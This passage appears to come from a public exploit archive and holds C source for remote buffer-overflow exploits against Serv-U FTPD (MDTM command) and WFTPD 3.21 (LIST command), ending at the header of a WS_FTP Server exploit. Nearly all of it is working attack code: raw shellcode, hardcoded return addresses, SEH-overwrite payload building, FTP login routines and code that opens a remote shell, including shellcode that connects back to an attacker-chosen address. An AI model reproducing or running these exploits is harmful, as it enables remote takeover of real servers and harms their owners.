"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x 99\x99\xF1\xFC"
"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x 99\x99\x1A\x75"
"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x 7B\x64\x5F\xDD"
"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\x CD\xBD\xD1\x10"
"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x 27\xDD\x98\x99"
"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x 2F\xA9\x98\x99"
"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\x CA\xCC\xCF\xCE"
"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x 4C\x12\xD3\x81"
"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x 6C\xAA\x66\x65"
"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x 72\x6B\xA2\xE5"
"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\x D2\x12\xC3\x85"
"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x 9D\x99\xC8\x66"
"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x 9D\xC0\x32\x7B"
"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x 10\x3F\xA9\x98"
"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x 1A\x58\x8C\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\x DD\xBD\xA4\x10"
"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\x DD\xBD\x89\x14"
"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\x C8\xC8\x66\x2F"
"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x 99\x99\xF1\x9E"
"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x 89\xF3\xD9\xF1"
"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x 2F\xDD\x98\x99"
"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x 1D\xBD\x2D\x99"
"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x 09\x09\x09\x09"
"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x 99\x99\xC8\xC9"
"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\x D1\x98\x99\x99"
"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\x AA\x59\xD1\xC9"
"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x 50\x25\x3F\xF2"
"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\x C1\x96\xD8\x0E"
"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\x A4\xF3\x2D\x19"
"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x 28\x87\x0E\x98"
"\x06\x06\x06\x06"
"\x53\x52\x31\x41";
/* new:
* tcp connect with no block socket, host to ip.
* millisecond timeout, it's will be fast.
*;D
* 2003/06/23 add by Sam
*/
int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
{
int sock,
flag,
pe = 0;
size_t pe_len;
struct timeval tv;
struct sockaddr_in addr;
struct hostent* hp = NULL;
fd_set rset;
// reslov hosts
hp = gethostbyname (host);
if (NULL == hp) {
perror ("tcpConnect:gethostbyname\n");
return -1;
}
sock = socket (AF_INET, SOCK_STREAM, 0);
if (-1 == sock) {
perror ("tcpConnect:socket\n");
return -1;
}
addr.sin_addr = *(struct in_addr *) hp->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
/* set socket no block
*/
flag = fcntl (sock, F_GETFL);
if (-1 == flag) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
flag |= O_NONBLOCK;
if (fcntl (sock, F_SETFL, flag) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
if (connect (sock, (const struct sockaddr *) &addr,
sizeof(addr)) < 0 &&
errno != EINPROGRESS) {
perror ("tcpConnect:connect\n");
close (sock);
return -1;
}
/* set connect timeout
* use millisecond
*/
tv.tv_sec = timeout/1000;
tv.tv_usec = timeout%1000;
FD_ZERO (&rset);
FD_SET (sock, &rset);
if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
// perror ("tcpConnect:select");
close (sock);
return -1;
}
pe_len = sizeof (pe);
if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
perror ("tcpConnect:getsockopt\n");
close (sock);
return -1;
}
if (pe != 0) {
errno = pe;
close (sock);
return -1;
}
if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
perror ("tcpConnect:fcntl\n");
close (sock);
return -1;
}
pe = 1;
pe_len = sizeof (pe);
if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
perror ("tcpConnect:setsockopt\n");
close (sock);
return -1;
}
return sock;
}
/* rip code, from hsj */
int sh (int in, int out, int s)
{
char sbuf[128], rbuf[128];
int i,
ti, fd_cnt,
ret=0, slen=0, rlen=0;
fd_set rd, wr;
fd_cnt = in > out ? in : out;
fd_cnt = s > fd_cnt ? s : fd_cnt;
fd_cnt ++;
for (;;) {
FD_ZERO (&rd);
if (rlen < sizeof (rbuf))
FD_SET (s, &rd);
if (slen < sizeof (sbuf))
FD_SET (in, &rd);
FD_ZERO (&wr);
if (slen)
FD_SET (s, &wr);
if (rlen)
FD_SET (out, &wr);
if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1))
break;
if (FD_ISSET (in, &rd)) {
if((i = read (in, (sbuf+slen),
(sizeof (sbuf) - slen))) == (-1)) {
ret = -2;
break;
}
else if (i == 0) {
ret = -3;
break;
}
slen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (s, &wr)) {
if ((i = write (s, sbuf, slen)) == (-1))
break;
if (i == slen)
slen = 0;
else {
slen -= i;
memmove (sbuf, sbuf + i, slen);
}
if (!(--ti))
continue;
}
if (FD_ISSET (s, &rd)) {
if ((i = read (s, (rbuf + rlen),
(sizeof (rbuf) - rlen))) <= 0)
break;
rlen += i;
if (!(--ti))
continue;
}
if (FD_ISSET (out, &wr)) {
if ((i = write (out, rbuf, rlen)) == (-1))
break;
if (i == rlen)
rlen = 0;
else {
rlen -= i;
memmove (rbuf, rbuf+i, rlen);
}
}
}
return ret;
}
int new_send (int fd, char *buff, size_t len)
{
int ret;
if ((ret = send (fd, buff, len, 0)) <= 0) {
perror ("new_write");
return -1;
}
return ret;
}
int new_recv (int fd, char *buff, size_t len)
{
int ret;
if ((ret = recv (fd, buff, len, 0)) <= 0) {
perror ("new_recv");
return -1;
}
return ret;
}
int ftp_login (char *hostName, short port, char *user, char *pass)
{
int ret, sock;
char buff[MAX_LEN];
fprintf (stderr, "# Connecting...... \n");
if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "220")) {
fprintf (stderr, "[-] failed. \n");
return -1;
}
fprintf (stderr, "[+] Connected. \n");
sleep (1);
fprintf (stderr, " USER %s .\n", user);
clearbit (buff);
snprintf (buff, sizeof (buff), "USER %s\r\n", user);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, " %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "331")) {
fprintf (stderr, "[-] user failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, " PASS %s .\n", pass);
clearbit (buff);
snprintf (buff, sizeof (buff), "PASS %s\r\n", pass);
ret = new_send (sock, buff, strlen (buff));
fprintf (stderr, " %d bytes send. \n", ret);
sleep (1);
clearbit (buff);
new_recv (sock, buff, sizeof (buff) - 1);
if (!strstr (buff, "230")) {
fprintf (stderr, "[-] pass failed. \n%s\n", buff);
return -1;
}
fprintf (stderr, "[+] login success .\n");
return sock;
}
void do_overflow (int sock)
{
int ret, i;
unsigned short newport;
char Comand [MAX_LEN] = {0}, chmodBuffer [600], rbuf[256];
clearbit (Comand);
clearbit (rbuf);
clearbit (chmodBuffer);
for(i = 0; i < 47; i++)
strcat(chmodBuffer, "a");
for(i = 0; i < 16; i += 8) {
*(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;
*(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78; //pop reg pop reg ret
}
newport = htons (shellport)^(unsigned short)0x9999;
memcpy (&shellcode[120 + 4], &newport, 2);
strcat(chmodBuffer, decoder);
fprintf (stderr, "[+] remote version: %s\n", architectures[x].desc);
fprintf (stderr, "[+] trigger vulnerability !\n ");
strcpy (Comand, "MDTM 20031111111111+");
strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);
strcat (Comand, " ");
strcat (Comand, shellcode);
strcat (Comand, "hacked_by.sst\r\n");
ret = new_send (sock, Comand, strlen (Comand));
fprintf (stderr, "[+] %d bytes overflow strings sent!\n", ret);
return;
}
/* print help messages.
* just show ya how to use.
*/
void showHELP (char *p)
{
int i;
fprintf (stderr, "Usage: %s [Options] \n", p);
fprintf (stderr, "Options:\n"
"\t-h [remote host]\tremote host\n"
"\t-P [server port]\tserver port\n"
"\t-t [system type]\tchoice the system type\n"
"\t-u [user name]\tlogin with this username\n"
"\t-p [pass word]\tlogin with this passwd\n"
"\t-d [shell port]\trebind using this port (default: ftpd port)\n\n");
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (i = 0; i <= MAX_NUM; i ++) {
printf ("%3d | %s\n", i, architectures[i].desc);
}
printf (" '\n");
return;
}
int main (int c, char *v[])
{
int ch, fd, sd;
char *hostName = NULL, *userName = "ftp", *passWord = "sst@SERV-u";
shellport = port;
fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
"bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n");
if (c < 2) {
showHELP (v[0]);
exit (1);
}
while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
switch(ch) {
case 'h':
hostName = optarg;
break;
case 't':
x = atoi (optarg);
if (x > MAX_NUM) {
printf ("[-] wtf your input?\n");
exit (-1);
}
break;
case 'u':
userName = optarg;
break;
case 'p':
passWord = optarg;
break;
case 'P':
port = atoi (optarg);
break;
case 'd':
shellport = atoi (optarg);
break;
default:
showHELP (v[0]);
return 0;
}
}
fd = ftp_login (hostName, port, userName, passWord);
if (fd <= 0) {
printf ("[-] can't connnect\n");
exit (-1);
}
do_overflow (fd);
close (fd);
sleep (3);
sd = new_tcpConnect (hostName, shellport, 3000);
if (sd <= 0) {
printf ("[-] failed\n");
return -1;
}
fprintf (stderr, "[+] successed!!\n\n\n");
sh (0, 1, sd);
close (sd);
return 0;
}
// [2004-02-27]
21 WFTPD Server <= 3.21 Remote Buffer Overflow Exploit
/*
* WFTPD buffer overflow exploit, (c) axl 2004, [email protected]
* Discovered by the very same guy :p
*
* Tested WFTPD versions:
*
* - WFTPD Pro Server 3.21 Release 1 (trial) (latest version)
* - WFTPD Pro Server 3.20 Release 2 (trial)
* - WFTPD Server 3.21 Release 1 (trial) (latest version)
* - WFTPD Server 3.10 Release 1 (trial)
*
* Tested exploit with these remote operating systems:
*
* - Windows XP Pro, SP1
*
* Should be very easy to support other Windows OSes. You may only have
* to update ret_addr.
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <windows.h>
#include <stdio.h>
#define MAXLINE 0x1000
//#define OLDCODE // Try not to uncomment this...
#ifdef OLDCODE
static char* ret_addr = "\xAC\x9C\xEC\x77";
// kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret
#else
/* See the comment in exploit() for the reasons I chose this address */
static char* ret_addr = "\x5B\xC0\xEB\x77";
// kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret
#endif
const unsigned int shlc_offs_enckey = 0x00000025;
const unsigned int shlc_offs_encstart = 0x0000002B;
const unsigned int shlc_offs_encend = 0x000001B8;
unsigned char shlc_code[] =
"\xEB\x16\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56\x 34\x12\x78\x56"
"\x34\x12\x5B\x53\x83\xEB\x1D\xC3\xE8\xF5\xFF\xFF\x FF\x33\xC9\xB1"
"\x64\x81\x74\x8B\x27\x55\x55\x55\x55\xE2\xF6\xFC\x 8B\x43\x0A\x31"
"\x43\x02\x8B\x43\x0E\x31\x43\x06\x89\x4B\x0A\x89\x 4B\x0E\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\xAD\x 8B\x68\x08\x8D"
"\x83\x67\x01\x00\x00\x55\xE8\xB7\x00\x00\x00\x68\x 33\x32\x00\x00"
"\x68\x77\x73\x32\x5F\x54\xFF\xD0\x96\x8D\x83\x74\x 01\x00\x00\x56"
"\xE8\x9D\x00\x00\x00\x81\xEC\x90\x01\x00\x00\x54\x 68\x01\x01\x00"
"\x00\xFF\xD0\x8D\x83\x7F\x01\x00\x00\x56\xE8\x83\x 00\x00\x00\x33"
"\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x 97\x8D\x83\x8A"
"\x01\x00\x00\x56\xE8\x69\x00\x00\x00\x33\xC9\x51\x 51\x51\x51\x6A"
"\x10\x8D\x4B\x02\x51\x57\xFF\xD0\xB9\x54\x00\x00\x 00\x2B\xE1\x88"
"\x6C\x0C\xFF\xE2\xFA\xC6\x44\x24\x10\x44\x41\x88\x 4C\x24\x3C\x88"
"\x4C\x24\x3D\x89\x7C\x24\x48\x89\x7C\x24\x4C\x89\x 7C\x24\x50\x49"
"\x8D\x44\x24\x10\x54\x50\x51\x51\x51\x6A\x01\x51\x 51\x8D\x83\xA4"
"\x01\x00\x00\x50\x51\x8D\x83\x95\x01\x00\x00\x55\x E8\x11\x00\x00"
"\x00\x59\xFF\xD0\x8D\x83\xAC\x01\x00\x00\x55\xE8\x 02\x00\x00\x00"
"\xFF\xD0\x60\x8B\x7C\x24\x24\x8D\x6F\x78\x03\x6F\x 3C\x8B\x6D\x00"
"\x03\xEF\x83\xC9\xFF\x41\x3B\x4D\x18\x72\x0B\x64\x 89\x0D\x00\x00"
"\x00\x00\x8B\xE1\xFF\xE4\x8B\x5D\x20\x03\xDF\x8B\x 1C\x8B\x03\xDF"
"\x8B\x74\x24\x1C\xAC\x38\x03\x75\xDC\x43\x84\xC0\x 75\xF6\x8B\x5D"
"\x24\x03\xDF\x0F\xB7\x0C\x4B\x8B\x5D\x1C\x03\xDF\x 8B\x0C\x8B\x03"
"\xCF\x89\x4C\x24\x1C\x61\xC3\x4C\x6F\x61\x64\x4C\x 69\x62\x72\x61"
"\x72\x79\x41\x00\x57\x53\x41\x53\x74\x61\x72\x74\x 75\x70\x00\x57"
"\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x57\x53\x 41\x43\x6F\x6E"
"\x6E\x65\x63\x74\x00\x43\x72\x65\x61\x74\x65\x50\x 72\x6F\x63\x65"
"\x73\x73\x41\x00\x63\x6D\x64\x2E\x65\x78\x65\x00\x 45\x78\x69\x74"
"\x50\x72\x6F\x63\x65\x73\x73\x00";
static char inbuf[MAXLINE];
static unsigned inoffs = 0;
const WFTPD_PRO_321_TRIAL = 0; // WFTPD Pro Server 3.21 Release 1 (trial)
const WFTPD_PRO_320_TRIAL = 1; // WFTPD Pro Server 3.20 Release 2 (trial)
const WFTPD_321_TRIAL = 2; // WFTPD Server 3.21 Release 1 (trial)
const WFTPD_310_TRIAL = 3; // WFTPD Server 3.10 Release 1 (trial)
int ftpver = WFTPD_PRO_321_TRIAL;
int isrd(SOCKET s)
{
fd_set r;
FD_ZERO(&r);
FD_SET(s, &r);
timeval t = {0, 0};
int ret = select(1, &r, NULL, NULL, &t);
if (ret < 0)
return 0;
else
return ret != 0;
}
int get_line(SOCKET s, char* string, unsigned len)
{
char* nl;
while ((nl = (char*)memchr(inbuf, '\n', inoffs)) == NULL)
{
if (inoffs >= sizeof(inbuf))
{
printf("[-] Too long line\n");
return 0;
}
int len = recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
if (len <= 0)
{
printf("[-] Error receiving data\n");
return 0;
}
inoffs += len;
}
unsigned nlidx = (unsigned)(ULONG_PTR)(nl - inbuf);
if (nlidx >= len)
{
printf("[-] Too small caller buffer\n");
return 0;
}
memcpy(string, inbuf, nlidx);
string[nlidx] = 0;
if (nlidx > 0 && string[nlidx-1] == '\r')
string[nlidx-1] = 0;
if (nlidx + 1 >= inoffs)
inoffs = 0;
else
{
memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
inoffs -= nlidx + 1;
}
return 1;
}
int ignorerd(SOCKET s)
{
inoffs = 0;
while (1)
{
if (!isrd(s))
return 1;
if (recv(s, inbuf, sizeof(inbuf), 0) < 0)
return 0;
}
}
int get_reply_code(SOCKET s)
{
char line[MAXLINE];
if (!get_line(s, line, sizeof(line)))
{
printf("[-] Could not get status code\n");
return -1;
}
char c = line[3];
line[3] = 0;
int code;
if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line)))
{
printf("[-] Weird reply\n");
return -1;
}
char endline[4];
memcpy(endline, line, 3);
endline[3] = ' ';
if (c == '-')
{
while (1)
{
if (!get_line(s, line, sizeof(line)))
{
printf("[-] Could not get next line\n");
return -1;
}
if (!memcmp(line, endline, sizeof(endline)))
break;
}
}
return code;
}
int sendb(SOCKET s, const char* buf, int len, int flags)
{
while (len)
{
int l = send(s, buf, len, flags);
if (l <= 0)
break;
len -= l;
buf += l;
}
return len == 0;
}
int sends(SOCKET s, const char* buf, int flags)
{
return sendb(s, buf, (int)strlen(buf), flags);
}
int is_valid_char(char c)
{
return c != 0 && c != '\n' && c != ' ';
}
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen)
{
if (dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs)
{
printf("[-] Buffer overflow ;)\n");
return 0;
}
memcpy((char*)dst+dstoffs, src, srclen);
dstoffs += srclen;
return 1;
}
int check_invd_bytes(const char* name, const void* buf, int buflen)
{
const char* b = (const char*)buf;
for (int i = 0; i < buflen; i++)
{
if (!is_valid_char(b[i]))
{
printf("[-] %s[%u] (%02X) cannot contain bytes 00h, 0Ah, or 20h\n", name, i, b[i]);
return 0;
}
}
return 1;
}
int enc_byte(char& c, char& k)
{
for (int i = 0; i < 0x100; i++)
{
if (!is_valid_char(c ^ i) || !is_valid_char(i))
continue;
c ^= i;
k = i;
return 1;
}
printf("[-] Could not find encryption key for byte %02X\n", c);
return 0;
}
int get_enc_key(char* buf, int size, int offs, int step)
{
for (int i = 0; i < 0x100; i++)
{
if (!is_valid_char(i))
continue;
for (int j = offs; j < size; j += step)
{
if (!is_valid_char(buf[j] ^ i))
break;
}
if (j < size)
continue;
return i;
}
printf("[-] Could not find an encryption key\n");
return -1;
}
int exploit(SOCKET s, unsigned long sip, unsigned short sport)
{
printf("[+] Trying buffer overflow + using SEH handler\n");
int ret = 0;
char* shellcode = NULL;
__try
{
shellcode = new char[sizeof(shlc_code)-1];
memcpy(shellcode, shlc_code, sizeof(shlc_code)-1);
shellcode[2] = (char)AF_INET;
shellcode[3] = (char)(AF_INET >> 8);
shellcode[4] = (char)(sport >> 8);
shellcode[5] = (char)sport;
shellcode[6] = (char)(sip >> 24);
shellcode[7] = (char)(sip >> 16);
shellcode[8] = (char)(sip >> 8);
shellcode[9] = (char)sip;
for (int i = 0; i < 8; i++)
{
if (!enc_byte(shellcode[2+i], shellcode[2+8+i]))
__leave;
}
for (int i = 0; i < 4; i++)
{
int k = get_enc_key(&shellcode[shlc_offs_encstart], shlc_offs_encend-shlc_offs_encstart, i, 4);
if (k < 0)
__leave;
shellcode[shlc_offs_enckey+i] = k;
}
printf("[+] Shellcode encryption key = %02X%02X%02X%02X\n", shellcode[shlc_offs_enckey+3],
shellcode[shlc_offs_enckey+2], shellcode[shlc_offs_enckey+1], shellcode[shlc_offs_enckey]);
for (int i = 0; i < shlc_offs_encend-shlc_offs_encstart; i++)
shellcode[shlc_offs_encstart+i] ^= shellcode[shlc_offs_enckey + i % 4];
if (!ignorerd(s))
__leave;
char sndbuf[0x1000];
int sndbufidx = 0;
char* badval = "\x01\xFF\x02\xFE";
const char* ftp_cmd = "LIST -";
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ftp_cmd, (int)strlen(ftp_cmd))) // req
__leave;
switch (ftpver)
{
#ifdef OLDCODE
case WFTPD_310_TRIAL: // doesn't save EBP on the stack
case WFTPD_321_TRIAL: // doesn't save EBP on the stack
case WFTPD_PRO_320_TRIAL:
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0]
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // trylevel
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // old EBP
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // ret addr
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg1
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg2
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg3
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg4
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg5
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4)) // arg6
__leave;
break;
case WFTPD_PRO_321_TRIAL:
default:
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // cookie
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0]
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // trylevel
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // old EBP
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // ret addr
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg1
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg2
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg3
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg4
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) || // arg5
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4)) // arg6
__leave;
break;
#else
case WFTPD_310_TRIAL: // doesn't save EBP on the stack
case WFTPD_321_TRIAL: // doesn't save EBP on the stack
case WFTPD_PRO_320_TRIAL:
case WFTPD_PRO_321_TRIAL: // pushes a cookie after old fs:[0]
default:
/*
* WFTPD Pro Server 3.21 saves a cookie so that the stack layout isn't the same as the
* other versions. However, with the right exception address, we can make it work.
* 77EBC05B = kernel32.dll => POP REG / POP REG / RET. This is the exception handler
* the older versions will execute. WFTPD Pro Server 3.21 will instead execute the
* instructions with the bytes in that same address. In this case, it'll execute these
* instructions:
* 5B POP EBX
* C0EB 77 SHR BL,77
* 5B POP EBX
* C0EB 77 SHR BL,77
* EB 1E JMP SHORT ourcode
*/
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0] OR cookie (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler OR old fs:[0] (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // trylevel OR exception handler (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\xEB\x1E\xFE\xFF", 4) || // (p321)
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4))
__leave;
break;
#endif
}
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), shellcode, sizeof(shlc_code)-1) || // our code
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), " \r\n", 3)) // req + end of line
__leave;
if (!check_invd_bytes("shellcode", shellcode, sizeof(shlc_code)-1) ||
!check_invd_bytes("ret_addr", ret_addr, sizeof(ret_addr)-1) ||
!check_invd_bytes("sndbuf", sndbuf+5, sndbufidx-3-5))
__leave;
in_addr a; a.s_addr = htonl(sip);
printf("[+] Sending shellcode which will connect to %s:%u...\n", inet_ntoa(a), sport);
if (!sendb(s, sndbuf, sndbufidx, 0))
{
printf("[-] Failed to send shellcode\n");
__leave;
}
printf("[+] Shellcode sent successfully\n");
ret = 1;
}
__finally
{
delete shellcode;
}
if (ret == 0)
printf("[-] Can't exploit the vulnerability\n");
return ret;
}
int login(SOCKET s, const char* username, const char* userpass)
{
printf("[+] Logging in...\n");
int code;
if (!ignorerd(s) || !sends(s, "USER ", 0) || !sends(s, username, 0) ||
!sends(s, "\r\n", 0) || (code = get_reply_code(s)) < 0)
{
printf("[-] Failed to log in #1\n");
return 0;
}
if (code == 331)
{
if (!sends(s, "PASS ", 0) || !sends(s, userpass, 0) ||
!sends(s, "\r\n", 0) || (code = get_reply_code(s)) < 0)
{
printf("[-] Failed to log in #2\n");
return 0;
}
}
if (code != 230)
{
printf("[-] Failed to log in. Code %3u\n", code);
return 0;
}
printf("[+] Logged in\n");
return 1;
}
void show_help(char* pname)
{
printf("%s <ip> <port> <sip> <sport> [-u username] [-p userpass] [-v <p321|p320|321|310>]\n", pname);
exit(1);
}
int main(int argc, char** argv)
{
printf("WFTPD <= v3.21r1 buffer overflow exploit, (c) axl 2004, [email protected]\n");
WSADATA wsa;
if (WSAStartup(0x0202, &wsa))
return 1;
if (argc < 5)
show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1]));
unsigned short port = (unsigned short)atoi(argv[2]);
unsigned long sip = ntohl(inet_addr(argv[3]));
unsigned short sport = (unsigned short)atoi(argv[4]);
const char* username = "anonymous";
const char* userpass = "axl";
for (int i = 5; i < argc; i++)
{
if (!strcmp(argv[i], "-u") && i + 1 < argc)
{
username = argv[++i];
}
else if (!strcmp(argv[i], "-p") && i + 1 < argc)
{
userpass = argv[++i];
}
else if (!strcmp(argv[i], "-v") && i + 1 < argc)
{
if (!stricmp(argv[i+1], "p321"))
ftpver = WFTPD_PRO_321_TRIAL;
else if (!stricmp(argv[i+1], "p320"))
ftpver = WFTPD_PRO_320_TRIAL;
else if (!stricmp(argv[i+1], "321"))
ftpver = WFTPD_321_TRIAL;
else if (!stricmp(argv[i+1], "310"))
ftpver = WFTPD_310_TRIAL;
else
show_help(argv[0]);
i++;
}
else
show_help(argv[0]);
}
if (!ip || !port || !sip || !sport)
show_help(argv[0]);
sockaddr_in saddr;
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
saddr.sin_addr.s_addr = htonl(ip);
SOCKET s = INVALID_SOCKET;
__try
{
in_addr a; a.s_addr = htonl(ip);
printf("[+] Connecting to %s:%u...\n", inet_ntoa(a), port);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0 || connect(s, (sockaddr*)&saddr, sizeof(saddr)) < 0)
{
printf("[-] Could not connect\n");
__leave;
}
printf("[+] Connected\n");
int code = get_reply_code(s);
if (code != 220)
{
printf("[-] Got reply %3u\n", code);
__leave;
}
if (!login(s, username, userpass))
__leave;
if (!exploit(s, sip, sport))
printf("[-] Lucky bastards...\n");
else
printf("[+] Santa's watching you!\n");
}
__finally
{
if (s != INVALID_SOCKET)
closesocket(s);
}
return 0;
}
// [2004-02-29]
21 WS_FTP Server <= 4.0.2 ALLO Remote Buffer Overflow Exploit
/*
* Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit
